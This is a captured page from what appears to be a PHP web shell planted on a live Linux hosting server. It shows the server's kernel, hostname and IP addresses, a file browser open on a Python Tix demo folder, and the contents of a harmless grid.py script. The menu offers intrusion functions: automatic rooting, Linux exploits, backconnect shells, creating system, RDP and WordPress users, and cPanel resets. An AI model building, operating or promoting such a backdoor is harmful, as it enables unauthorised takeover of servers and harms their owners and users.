Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.38.198
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib64 /
python2.7 /
Demo /
tix /
[ HOME SHELL ]
Name
Size
Permission
Action
bitmaps
[ DIR ]
drwxr-xr-x
samples
[ DIR ]
drwxr-xr-x
INSTALL.txt
3.67
KB
-rw-r--r--
README.txt
726
B
-rw-r--r--
grid.py
550
B
-rw-r--r--
grid.pyc
1.25
KB
-rw-r--r--
grid.pyo
1.25
KB
-rw-r--r--
tixwidgets.py
37.51
KB
-rw-r--r--
tixwidgets.pyc
37.7
KB
-rw-r--r--
tixwidgets.pyo
37.7
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : grid.py
### import Tix as tk from pprint import pprint r= tk.Tk() r.title("test") l=tk.Label(r, name="a_label") l.pack() class MyGrid(tk.Grid): def __init__(self, *args, **kwargs): kwargs['editnotify']= self.editnotify tk.Grid.__init__(self, *args, **kwargs) def editnotify(self, x, y): return True g = MyGrid(r, name="a_grid", selectunit="cell") g.pack(fill=tk.BOTH) for x in xrange(5): for y in xrange(5): g.set(x,y,text=str((x,y))) c = tk.Button(r, text="Close", command=r.destroy) c.pack() tk.mainloop()
Close